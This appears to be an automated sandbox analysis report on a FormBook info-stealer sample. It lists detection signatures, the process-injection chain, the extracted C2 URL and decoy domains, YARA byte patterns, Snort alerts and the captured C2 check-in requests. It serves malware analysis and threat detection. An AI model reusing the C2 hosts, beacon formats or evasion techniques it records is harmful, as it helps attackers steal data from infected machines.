Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report AQJEKNHnWK.exe

Overview

General Information

Sample Name:AQJEKNHnWK.exe
Analysis ID:383851
MD5:5d8702803555ff684424ebd13eda9f47
SHA1:f8b1197457782ba958fc7178fb838119c8138374
SHA256:f7e96b7c6612b709e413bbc8c72796cadbb7ce91ed17ec77d5ba4d4422e729cb
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • AQJEKNHnWK.exe (PID: 1724 cmdline: 'C:\Users\user\Desktop\AQJEKNHnWK.exe' MD5: 5D8702803555FF684424EBD13EDA9F47)
    • AQJEKNHnWK.exe (PID: 4772 cmdline: 'C:\Users\user\Desktop\AQJEKNHnWK.exe' MD5: 5D8702803555FF684424EBD13EDA9F47)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • explorer.exe (PID: 1156 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
          • cmd.exe (PID: 5560 cmdline: /c del 'C:\Users\user\Desktop\AQJEKNHnWK.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.th0rgramm.com/hx3a/"], "decoy": ["xn--ol-xia.com", "gracieleesgiftsandmore.com", "invenufas.com", "nexgencoder.com", "virginiabrightseleccion.com", "selectenergyservicestx.com", "warchocki.com", "xn--comercialvioo-tkb.website", "losangelesbraiders.com", "skaraonline.com", "freeworldsin.com", "jabberjawmobile.com", "orgoneartist.com", "xyfzfl.com", "arooko.com", "investmentpartners.limited", "ugonget.com", "ringforklift.com", "recovatek.com", "bukannyaterbuai24.com", "formula-kuhni.com", "cyfss.com", "stkify.com", "aksharnewtown.com", "libroricardoanaya.com", "phillhutt.com", "mywinnersworld.com", "school17obn.com", "cocoshop.info", "netzcorecloud.com", "bookbeachchairs.com", "summitsolutionsnow.com", "yakudatsu-hikaku.com", "elitedrive.net", "jjwheelerphotography.com", "motcamket.com", "hatikuturkila.com", "tonton-koubou.com", "roughcuttavernorder.com", "leagueofconsciouscreatives.com", "worldsabroad.com", "ezmodafinil.com", "apettelp.club", "xn--jvrr98g37n88d.com", "gobiodisc.com", "alliedcds.com", "jillspickles.com", "alfenas.info", "herbalyesman.xyz", "sugary-sweet.com", "rigscart.com", "curiget.xyz", "stacksyspro.net", "sxqyws.net", "solocubiertos.com", "actuualizarinfruma.com", "thecurmudgeonsspeakout.com", "paydaegitimkurumlari.com", "sellingdealsinheels.com", "dezhou8.xyz", "thelitigatorsbookclub.com", "rainbowsdepot.com", "serenityislegalveston.com", "contactredzonetalent.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000000.00000002.216654991.000000001EEF0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000000.00000002.216654991.000000001EEF0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.AQJEKNHnWK.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.AQJEKNHnWK.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.AQJEKNHnWK.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158b9:$sqlite3step: 68 34 1C 7B E1
        • 0x159cc:$sqlite3step: 68 34 1C 7B E1
        • 0x158e8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
        • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
        1.1.AQJEKNHnWK.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.1.AQJEKNHnWK.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.th0rgramm.com/hx3a/"], "decoy": ["xn--ol-xia.com", "gracieleesgiftsandmore.com", "invenufas.com", "nexgencoder.com", "virginiabrightseleccion.com", "selectenergyservicestx.com", "warchocki.com", "xn--comercialvioo-tkb.website", "losangelesbraiders.com", "skaraonline.com", "freeworldsin.com", "jabberjawmobile.com", "orgoneartist.com", "xyfzfl.com", "arooko.com", "investmentpartners.limited", "ugonget.com", "ringforklift.com", "recovatek.com", "bukannyaterbuai24.com", "formula-kuhni.com", "cyfss.com", "stkify.com", "aksharnewtown.com", "libroricardoanaya.com", "phillhutt.com", "mywinnersworld.com", "school17obn.com", "cocoshop.info", "netzcorecloud.com", "bookbeachchairs.com", "summitsolutionsnow.com", "yakudatsu-hikaku.com", "elitedrive.net", "jjwheelerphotography.com", "motcamket.com", "hatikuturkila.com", "tonton-koubou.com", "roughcuttavernorder.com", "leagueofconsciouscreatives.com", "worldsabroad.com", "ezmodafinil.com", "apettelp.club", "xn--jvrr98g37n88d.com", "gobiodisc.com", "alliedcds.com", "jillspickles.com", "alfenas.info", "herbalyesman.xyz", "sugary-sweet.com", "rigscart.com", "curiget.xyz", "stacksyspro.net", "sxqyws.net", "solocubiertos.com", "actuualizarinfruma.com", "thecurmudgeonsspeakout.com", "paydaegitimkurumlari.com", "sellingdealsinheels.com", "dezhou8.xyz", "thelitigatorsbookclub.com", "rainbowsdepot.com", "serenityislegalveston.com", "contactredzonetalent.com"]}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\nsxFC1A.tmp\bdww7k1w8bk0.dllReversingLabs: Detection: 20%
          Multi AV Scanner detection for submitted fileShow sources
          Source: AQJEKNHnWK.exeVirustotal: Detection: 18%Perma Link
          Source: AQJEKNHnWK.exeReversingLabs: Detection: 35%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.216654991.000000001EEF0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.256189783.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.210481681.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.255958752.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.256046021.00000000005E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.468337581.0000000000840000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.468235656.0000000000810000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.AQJEKNHnWK.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.AQJEKNHnWK.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.AQJEKNHnWK.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.AQJEKNHnWK.exe.1eef0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.AQJEKNHnWK.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.AQJEKNHnWK.exe.1eef0000.4.unpack, type: UNPACKEDPE
          Source: 7.2.explorer.exe.2d564d0.3.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 7.2.explorer.exe.4e47960.6.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 1.2.AQJEKNHnWK.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.1.AQJEKNHnWK.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.AQJEKNHnWK.exe.1eef0000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: AQJEKNHnWK.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: explorer.pdbUGP source: AQJEKNHnWK.exe, 00000001.00000002.256768707.00000000026C0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: AQJEKNHnWK.exe, 00000000.00000003.210067388.000000001F0E0000.00000004.00000001.sdmp, AQJEKNHnWK.exe, 00000001.00000002.256332303.0000000000B5F000.00000040.00000001.sdmp, explorer.exe, 00000007.00000002.473937643.0000000004A2F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: AQJEKNHnWK.exe, explorer.exe
          Source: Binary string: explorer.pdb source: AQJEKNHnWK.exe, 00000001.00000002.256768707.00000000026C0000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 0_2_004026BC FindFirstFileA,
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49724 -> 23.227.38.74:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49724 -> 23.227.38.74:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49724 -> 23.227.38.74:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.th0rgramm.com/hx3a/
          Source: global trafficHTTP traffic detected: GET /hx3a/?tZUT=0fll8pJq7ZAUibPF4kinhno6RtSSoQWPS25LacVc9zIksnHvjqyKkUnVN9tOTAaZP4N+&9r98J=FbY8OBD HTTP/1.1Host: www.mywinnersworld.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hx3a/?tZUT=3J4IwxDxyQGM57lngVTovpY0RYYybvKdXCCorOYcpgj/2IXBVenraHtymYKqlnAzAiYz&9r98J=FbY8OBD HTTP/1.1Host: www.gracieleesgiftsandmore.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hx3a/?tZUT=vULSFbXUfWqfH/UQKANXmh//LRVD9fF+bm7wgJ2FfsCiVE70xyhWGRMHpTR01i4U7VcQ&9r98J=FbY8OBD HTTP/1.1Host: www.tonton-koubou.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hx3a/?tZUT=etiEYBoPDxOhXHdNW+toGoO48BEbVYBhZG7o21xT+1ckFZjGUMv71muAk6m7YJWGV3TF&9r98J=FbY8OBD HTTP/1.1Host: www.phillhutt.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 23.227.38.74 23.227.38.74
          Source: Joe Sandbox ViewASN Name: INTERQGMOInternetIncJP INTERQGMOInternetIncJP
          Source: Joe Sandbox ViewASN Name: DXTL-HKDXTLTseungKwanOServiceHK DXTL-HKDXTLTseungKwanOServiceHK
          Source: Joe Sandbox ViewASN Name: WEBHOST1-ASRU WEBHOST1-ASRU
          Source: global trafficHTTP traffic detected: GET /hx3a/?tZUT=0fll8pJq7ZAUibPF4kinhno6RtSSoQWPS25LacVc9zIksnHvjqyKkUnVN9tOTAaZP4N+&9r98J=FbY8OBD HTTP/1.1Host: www.mywinnersworld.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hx3a/?tZUT=3J4IwxDxyQGM57lngVTovpY0RYYybvKdXCCorOYcpgj/2IXBVenraHtymYKqlnAzAiYz&9r98J=FbY8OBD HTTP/1.1Host: www.gracieleesgiftsandmore.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hx3a/?tZUT=vULSFbXUfWqfH/UQKANXmh//LRVD9fF+bm7wgJ2FfsCiVE70xyhWGRMHpTR01i4U7VcQ&9r98J=FbY8OBD HTTP/1.1Host: www.tonton-koubou.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hx3a/?tZUT=etiEYBoPDxOhXHdNW+toGoO48BEbVYBhZG7o21xT+1ckFZjGUMv71muAk6m7YJWGV3TF&9r98J=FbY8OBD HTTP/1.1Host: www.phillhutt.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.rainbowsdepot.com
          Source: explorer.exe, 00000004.00000000.241718690.00000000089FD000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000007.00000002.474718381.0000000004FC2000.00000004.00000001.sdmpString found in binary or memory: http://julianlawoffices.law/hx3a/?tZUT=Iu/IXyUbTVDu5P2JH19Ubbm/NNayCdBr7HPQNpzBLmA
          Source: explorer.exe, 00000007.00000002.474718381.0000000004FC2000.00000004.00000001.sdmpString found in binary or memory: http://tonton-koubou.com/hx3a/?tZUT=vULSFbXUfWqfH/UQKANXmh//LRVD9fF
          Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000007.00000002.472073266.0000000002DBC000.00000004.00000020.sdmpString found in binary or memory: http://www.formula-kuhni.com/eIm#
          Source: explorer.exe, 00000007.00000002.472169147.0000000002DCF000.00000004.00000020.sdmpString found in binary or memory: http://www.formula-kuhni.com/hx3a/?tZUT=caEAE6TOQuxSMBR5BS8nf
          Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000004.00000000.241792611.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 0_2_00404EA0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.216654991.000000001EEF0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.256189783.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.210481681.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.255958752.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.256046021.00000000005E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.468337581.0000000000840000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.468235656.0000000000810000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.AQJEKNHnWK.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.AQJEKNHnWK.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.AQJEKNHnWK.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.AQJEKNHnWK.exe.1eef0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.AQJEKNHnWK.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.AQJEKNHnWK.exe.1eef0000.4.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.216654991.000000001EEF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.216654991.000000001EEF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.256189783.0000000000A00000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.256189783.0000000000A00000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.210481681.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.210481681.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.255958752.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.255958752.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.256046021.00000000005E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.256046021.00000000005E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.468337581.0000000000840000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.468337581.0000000000840000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.468235656.0000000000810000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.468235656.0000000000810000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.AQJEKNHnWK.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.AQJEKNHnWK.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
